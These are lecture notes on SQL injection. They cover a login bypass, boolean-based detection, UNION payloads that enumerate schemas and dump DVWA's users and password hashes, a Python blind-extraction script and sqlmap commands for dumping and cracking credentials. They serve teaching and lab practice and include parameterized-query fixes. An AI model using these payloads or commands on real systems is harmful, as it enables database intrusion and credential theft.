4/2/2018
Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE
SQL Injection attacks
o Example
Damn Vulnerable Web App – DVWA
o Examples
Sqlmap
o Examples
SQL injection can do more harm than just bypassing the login check. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email addresses, and passwords to the attacker's remote server
o Getting user login details, etc.
Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password'
o Type the same payload into both fields:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
o The query will be:
SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
=> AND binds tighter than OR, so this reads as Username='1' OR ('1'='1' AND Password='1') OR '1'='1'. The final OR '1'='1' is always true, every row of Users is returned, and the system authenticates the attacker without knowing a valid username or password.
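The bypass above, as an added example that is not part of the lecture slides: a Python script against an in-memory SQLite database (the lecture's target is MySQL; the table, rows and function names are constructed for this demo). The vulnerable function builds the slide's query by string concatenation, so the payload returns every row; the parameterized version treats the same input as a literal username and returns nothing.

```python
import sqlite3

# Constructed demo database; the lecture's real target is DVWA on MySQL.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.execute("INSERT INTO Users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")
    return con

def vulnerable_login(con, username, password):
    """Mirrors the slide's query: user input is pasted straight into the SQL
    text, so a quote in the input changes the structure of the statement."""
    sql = (f"SELECT * FROM Users WHERE Username='{username}' "
           f"AND Password='{password}'")
    return con.execute(sql).fetchall()

def safe_login(con, username, password):
    """Same query, but the values travel as bound parameters. The database
    receives the statement and the data separately, so the data can never
    become SQL."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return con.execute(sql, (username, password)).fetchall()

PAYLOAD = "1' or '1' = '1"   # the slide's input, typed into both fields

if __name__ == "__main__":
    con = make_db()
    # Both rows come back: the trailing OR '1'='1' makes the WHERE clause true.
    print(vulnerable_login(con, PAYLOAD, PAYLOAD))
    # No row: there is no user literally named "1' or '1' = '1".
    print(safe_login(con, PAYLOAD, PAYLOAD))
```

Run it and compare the two lines: the application code is identical apart from how the input reaches the query, and only the parameterized version still authenticates nobody.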
SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10
Test the parameter with the AND and OR operators (boolean-based detection). The id is numeric and unquoted, so no quote is needed to break out of the query.
First append a condition that is always false:
SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> the page shows no content or a blank page, because no row satisfies the WHERE clause.
Then send a statement that is always true and check that the normal product comes back:
Ex: http://www.example.com/product.php?id=10 AND 1=1
=> a different response for 1=1 and 1=2 shows that the parameter is injectable.
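The AND 1=2 / AND 1=1 test above, automated in Python as an added example (not from the slides) against a constructed SQLite stand-in for product.php, and extended in the way a tester would: once the true/false difference is confirmed, the same oracle reads any value in the database one character at a time, which is what sqlmap's boolean-based blind technique does in the later sections. Table names, sample rows and the function names are assumptions for this demo.

```python
import sqlite3

# Constructed in-memory stand-in for the lecture's product.php?id=N page
# (the real target would be a MySQL-backed PHP script; sample data is made up).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id_product INTEGER, name TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)",
                    [(10, "Widget"), (11, "Gadget")])
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return con

def vulnerable_page(con, id_param):
    """The slide's query: the id is pasted unquoted into the SQL text.
    Returns the rows the page would render ([] models the blank page)."""
    sql = f"SELECT * FROM products WHERE id_product={id_param}"
    return con.execute(sql).fetchall()

def safe_page(con, id_param):
    """Hardened variant: the id is validated as an integer and bound as a
    parameter, so 'AND 1=1' can never reach the query as SQL."""
    try:
        product_id = int(id_param)
    except ValueError:
        return []
    return con.execute("SELECT * FROM products WHERE id_product=?",
                       (product_id,)).fetchall()

def is_boolean_injectable(fetch, base_id="10"):
    """The AND 1=2 / AND 1=1 test from the slide. 'fetch' takes the raw
    value of the id parameter and returns the page content."""
    baseline = fetch(base_id)
    if not baseline:
        return False                      # need a page that normally shows content
    false_page = fetch(f"{base_id} AND 1=2")
    true_page = fetch(f"{base_id} AND 1=1")
    # Injectable when a false condition blanks the page but a true one does not.
    return false_page == [] and true_page == baseline

def blind_extract(fetch, subquery, base_id="10", max_len=64):
    """Boolean-based blind extraction: recover the single string value that
    'subquery' returns, one character at a time, using only the true/false
    difference in the page. Each character is found by binary search over
    its code point (about seven requests per character)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                    # search the ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}),{pos},1)) > {mid}"
            if fetch(f"{base_id} AND {cond}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                        # past the end: every probe was false
            break
        result += chr(lo)
    return result

if __name__ == "__main__":
    con = make_db()
    vuln = lambda p: vulnerable_page(con, p)
    print(is_boolean_injectable(vuln))                          # True
    print(is_boolean_injectable(lambda p: safe_page(con, p)))   # False
    print(blind_extract(vuln, "SELECT password FROM users WHERE user='admin'"))  # S3cret!
```

The detection needs nothing but "page with product" versus "blank page"; no database error has to be displayed. The extraction loop is the reason a boolean difference on a harmless-looking product page is treated as a full data disclosure.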
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
1.1 Download DVWA
1.2 Create database and user in DVWA
1.3 Config DVWA
1.4 Setup basic database in DVWA
1.5 Access DVWA
http://10.0.0.2/login.php
Set DVWA Security Level: Low
Basic injection (normal input): 1
Always-true scenario:
o %' or '0'='0
Display database version:
o %' or 0=0 union select null, version() #
Display database user:
o %' or 0=0 union select null, user() #
Display database name:
o %' or 0=0 union select null, database() #
Display all tables listed in information_schema (and 1=0 suppresses the real rows, so only the UNION rows are shown):
o %' and 1=0 union select null, table_name from
information_schema.tables #
Display the tables whose name starts with "user":
o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
Display all columns of the users table, from information_schema.columns:
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
Dump the contents of the users table (0x0a is a newline separator between fields):
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
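The enumeration sequence above, reproduced as an added example that is not taken from DVWA or the slides. It assumes the two-column, single-quoted shape of DVWA's low-security query and replaces MySQL with an in-memory SQLite database so the script runs offline; the payloads keep the slides' structure (%' to close the quote, and 1=0 to suppress the real rows, union select null, <value> to fill the two columns) but swap the MySQL-only pieces for SQLite equivalents. user() and database() have no SQLite counterpart and are omitted. The sample rows are constructed.

```python
import sqlite3

# Constructed stand-in for DVWA's users table. DVWA runs on MySQL; this demo
# uses SQLite so that it runs offline, and the sample rows/hashes are made up.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, "
                "last_name TEXT, user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "admin-pw-hash"),
        (2, "Gordon", "Brown", "gordonb", "gordonb-pw-hash"),
    ])
    return con

def vulnerable_lookup(con, user_id):
    """Assumed shape of DVWA's low-security query: two selected columns and
    the id inside single quotes. That is why every slide payload opens with
    %' (to close the quote) and supplies exactly two UNION columns."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()

# The slide's MySQL payloads translated for SQLite:
#   '#' comment            -> '--'
#   version()              -> sqlite_version()
#   information_schema.*   -> sqlite_master / pragma_table_info()
#   concat(a, 0x0a, b)     -> a || char(10) || b
PAYLOADS = {
    "always_true": "%' or '0'='0",
    "version": "%' or 0=0 union select null, sqlite_version() --",
    "tables": "%' and 1=0 union select null, name "
              "from sqlite_master where type='table' --",
    "columns": "%' and 1=0 union select null, 'users' || char(10) || name "
               "from pragma_table_info('users') --",
    "dump": "%' and 1=0 union select null, first_name || char(10) || last_name "
            "|| char(10) || user || char(10) || password from users --",
}

def run_payload(con, key):
    """Send one payload through the vulnerable lookup and return the second
    column of every row, which is where the injected value is displayed."""
    return [row[1] for row in vulnerable_lookup(con, PAYLOADS[key])]

if __name__ == "__main__":
    con = make_db()
    for key in PAYLOADS:
        print(key, run_payload(con, key))
```

The column count matters: a UNION whose SELECT returns a different number of columns from the original query is a syntax error, which is why the first step against an unknown application is to find that count (sqlmap does this automatically) before any of the information_schema queries can work.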
sqlmap is an open source penetration testing tool that automates the process of
o detecting and exploiting SQL injection flaws
o taking over database servers.
It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from
o database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download and install sqlmap:
http://sqlmap.sourceforge.net/doc/README.html#s1
Open Firefox and install the Tamper Data add-on; it appears under the Tools menu
Select Tools\Tamper Data
Start Tamper Data
Run SQL injection
Tamper with the request and copy two values from it
o The target URL (Ref)
Ex: http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
o The Cookie header (Coo); sqlmap must send it to reuse the logged-in DVWA session and its security=low setting
Ex: PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low
Run sqlmap to obtain the following pieces of information
o Obtain the database user for DVWA (-b also prints the DBMS banner). Syntax:
./sqlmap.py -u <Ref> --cookie <Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
security=low" -b --current-db --current-user
Do you want to keep testing? Y => Result
Run sqlmap
o Obtain DBMS usernames and password hashes (--string gives sqlmap a word that appears only in the "true" page, so it can tell true from false responses). Syntax:
./sqlmap.py -u <Ref> --cookie <Coo> --string="Surname" --users --passwords
Use dictionary attack? Y
Dictionary location? <Press Enter>
o Obtain the privileges of the db_hacker DBMS user. Syntax:
./sqlmap.py -u <Ref> --cookie <Coo> -U db_hacker --privileges
o Obtain a list of all databases:
./sqlmap.py -u <Ref> --cookie <Coo> --dbs
o Obtain the tables of the "dvwa" database:
./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa --tables
o Obtain the columns of table dvwa.users:
./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa -T users --columns
Run sqlmap
o Obtain users and their passwords from table dvwa.users. Syntax:
./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa -T users -C user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible hash values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? Y
Use sqlmap to obtain the following pieces of information:
o A list of DBMS usernames and password hashes
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table